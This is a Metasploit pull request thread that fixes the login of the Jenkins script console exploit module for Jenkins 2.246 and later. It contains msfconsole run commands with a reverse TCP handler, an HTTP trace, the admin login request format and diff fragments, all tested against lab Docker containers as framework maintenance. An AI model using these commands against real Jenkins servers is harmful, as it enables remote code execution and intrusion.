### PR TITLE
Fix Jenkins Login For Newer Versions

### LINKED ISSUE #16945: Jenkins Script Console Login Broken
The `exploit/multi/http/jenkins_script_console` module fails to run against version 2.346.3 (pushed to docker hub on 2022-08-10) because the login process fails. I noticed this while testing #16750. I was able to confirm that it is working on Jenkins 2.60.3 (pushed to docker hub on 2018-07-17), so it was broken sometime during that 4 year period.

At least one issue is that the URI changed from `j_acegi_security_check` to `j_spring_security_check`. There could be additional changes.

## Steps to reproduce

1. Pull down docker `2.346.3` from docker, run it like `docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:2.346.3`
1. Note the admin password (it looks like a hash)
2. Set the USERNAME to admin and the PASSWORD to that value
3. Run the module and see the login process fail

### PR DESCRIPTION
**Pull request by zeroSteiner**
Fixes #16945. Jenkins v2.246 ([pushed to docker July 21st 2020](https://hub.docker.com/layers/jenkins/jenkins/2.246/images/sha256-c3e00e828037da5daa6634e8b74be0f209fa58b99fb76a344bbc0fad243319f5?context=explore)) changed how the login works. This PR updates the exploit module to handle this, effectively allowing the module to target Jenkins version 2.246 and later.

Also dropped the custom linux stager favor of the standard CmdStager library. This wasn't done originally because it wasn't available yet, see my original comment on the matter here https://github.com/rapid7/metasploit-framework/pull/1338#issuecomment-12474751 At the time the command stagers were mixins and hadn't been unified yet until https://github.com/rapid7/metasploit-framework/pull/2484.

## Verification

List the steps needed to make sure this thing works

- [ ] Run a target docker container: `docker run -p 8080:8080 jenkins/jenkins:2.346.3`
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/jenkins_script_console`
- [ ] Set the `RPORT`, `TARGET`, `PAYLOAD` and `PASSWORD` options (the password is in the docker output)
- [ ] Run the module and see it work

Tested successfully on the following Jenkins versions (while trying to make sure there wasn't an intermediate version)

* 2.346.3 (crumb v2)
* 1.565 (old-style)
* 2.60.3 (crumb v1)
* 2.203 (crumb v1)
* 2.275 (crumb v2)
* 2.239 (crumb v1)
* 2.257 (crumb v2)
* 2.248 (crumb v2)
* 2.244 (crumb v1)
* 2.246 crumb v2)
* 2.245 (crumb v1)

### CODE REVIEW

**Comment by adfoster-r7** [comment]
After spinning up `docker run -p 8080:8080 jenkins/jenkins:2.346.3` and running through the install steps this module doesn't seem to work for me just yet 👀 

Before:
```
msf6 exploit(multi/http/jenkins_script_console) > run http://admin:0e33e7d6939343f0b576070d1ef39c5c@192.168.123.128:8080 lhost=192.168.123.1

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Checking access to the script console
[*] Logging in...
[-] Exploit aborted due to failure: no-access: Login failed
[*] Exploit completed, but no session was created.
```

After:
```
msf6 exploit(multi/http/jenkins_script_console) > run http://admin:0e33e7d6939343f0b576070d1ef39c5c@192.168.123.128:8080 lhost=192.168.123.1

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Checking access to the script console
[*] Logging in...
[-] Exploit aborted due to failure: unexpected-reply: Unexpected reply from server
[*] Exploit completed, but no session was created.
```

Logging in manually works:

<img width="1032" alt="image" src="https://user-images.githubusercontent.com/60357436/190412839-c5957b65-ad93-459a-a12f-ce2cfe1595b9.png">

For the browser it looks like it's posting directly into `http://192.168.123.128:8080/j_spring_security_check` with `j_username=admin&j_password=0e33e7d6939343f0b576070d1ef39c5c&from=%2Fscript&Submit=`


With http trace:
```
msf6 exploit(multi/http/jenkins_script_console) > rerun httptrace=true 
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Checking access to the script console
####################
# Request:
####################
GET /jenkins/script HTTP/1.1
Host: 192.168.123.128:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15


####################
# Response:
####################
HTTP/1.1 403 Forbidden
Date: Thu, 15 Sep 2022 13:21:49 GMT
X-Content-Type-Options: nosniff
Set-Cookie: JSESSIONID.66751a42=node01uc9jaogydfzd1h4q7z8lwx1po38.node0; Path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=utf-8
X-Hudson: 1.395
X-Jenkins: 2.346.3
X-Jenkins-Session: 430824f9
Content-Length: 573
Server: Jetty(9.4.45.v20220203)

<html><head><meta http-equiv='refresh' content='1;url=/login?from=%2Fjenkins%2Fscript'/><script>window.location.replace('/login?from=%2Fjenkins%2Fscript');</script></head><body style='background-color:white; color:white;'>


Authentication required
<!--
-->

</body></html>                                                                                                                                                                                                                                                                                                            
[*] Logging in...
####################
# Request:
####################
GET /jenkins/login HTTP/1.1
Host: 192.168.123.128:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15


####################
# Response:
####################
HTTP/1.1 403 Forbidden
Date: Thu, 15 Sep 2022 13:21:49 GMT
X-Content-Type-Options: nosniff
Set-Cookie: JSESSIONID.66751a42=node0714stpt6heuv1bjekmg9nnosk39.node0; Path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=utf-8
X-Hudson: 1.395
X-Jenkins: 2.346.3
X-Jenkins-Session: 430824f9
Content-Length: 571
Server: Jetty(9.4.45.v20220203)

<html><head><meta http-equiv='refresh' content='1;url=/login?from=%2Fjenkins%2Flogin'/><script>window.location.replace('/login?from=%2Fjenkins%2Flogin');</script></head><body style='background-color:white; color:white;'>


Authentication required
<!--
-->

</body></html>                                                                                                                                                                                                                                                                                                            
[-] Exploit aborted due to failure: unexpected-reply: Unexpected reply from server
[*] Exploit completed, but no session was created.
```

From a quick glance - it looks like the status check might be wrong, and the javascript redirect isn't being followed? Let me know if it's just pebkac though 🤔

**Comment by adfoster-r7** [comment]
Ah, the verification steps were missing the `set TARGETURI /` - I wonder if we could detect this scenario better for the user

File: modules/exploits/multi/http/jenkins_script_console.rb [hunk 1]
```diff
@@ -40,7 +40,7 @@ def initialize(info = {})
               'CmdStagerFlavor' => [ 'certutil', 'vbs' ]
             }
           ],
-          ['Linux', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
+          ['Linux', { 'Arch' => [ ARCH_X64, ARCH_X86 ], 'Platform' => 'linux' }],
```
Comment (adfoster-r7) [inline modules/exploits/multi/http/jenkins_script_console.rb:43]: Just a confirmation question - when the user sets the target to linux, as they expected to manually change the payload too? 👀

Comment (zeroSteiner) [reply modules/exploits/multi/http/jenkins_script_console.rb:43]: Yeah but I think if the payload is left unset, the default payload selection logic will kick in and pick one automagically. Would the alternative be to hard code a default here?

**Comment by zeroSteiner** [comment]
Yeah I forgot to mention that the default `TARGETURI` is `/` for the docker container instead of `/jenkins/` which the module uses. We could change it but that'd be a backwards breaking change right?

File: modules/exploits/multi/http/jenkins_script_console.rb (hunk 1 above)
Comment (adfoster-r7) [reply modules/exploits/multi/http/jenkins_script_console.rb:43]: For me a payload isn't rechoosen; Potentially due to https://github.com/rapid7/metasploit-framework/pull/13566

**Comment by adfoster-r7** [comment]
Happy to leave it as-is; It's not a blocker for me, but maybe we could detect the scenario when the jenkins server returns those types of responses that the TARGETURI might be wrong and have that within the error message that bubbles up to the user? 🤔 

That seems (naively) relatively low effort for a good UX improvement

File: modules/exploits/multi/http/jenkins_script_console.rb [hunk 2]
```diff
@@ -187,9 +161,19 @@ def exploit
         end
       else
         print_status('Logging in...')
+        # get that first cookie that's needed by newer versions
+        res = send_request_cgi({ 'uri' => normalize_uri(@uri.path, 'login'), 'keep_cookies' => true })
+        fail_with(Failure::UnexpectedReply, 'Unexpected reply from server') unless res&.code == 200
```
Comment (adfoster-r7) [inline modules/exploits/multi/http/jenkins_script_console.rb:166]: Just looping in the suggestion that we could do error detection here when the user has pointed the module to a jenkins instance running on `/` and hasn't updated the TARGETURI value from the default `/jenkins` to `/`

https://github.com/rapid7/metasploit-framework/pull/17013#issuecomment-1248099303

**Review by adfoster-r7 — APPROVED** [review]

**Comment by zgoldman-r7** [comment]
## Release Notes
This PR enhances `exploit/multi/http/jenkins_script_console` to handle changes to the login process for Jenkins newer than version 2.246.

**Pull request merged**